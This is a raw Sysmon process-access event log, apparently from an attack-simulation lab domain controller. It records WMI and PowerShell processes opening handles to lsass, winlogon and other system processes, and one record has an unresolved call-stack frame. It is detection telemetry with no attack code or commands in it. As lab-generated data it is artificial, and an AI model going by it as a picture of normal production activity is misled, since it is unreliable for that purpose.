13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.280{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-85A7-5FCF-F700-000000009101}8164316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF819366453) 10341000x80000000000000006144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A8-5FCF-FC00-000000009101}4132C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 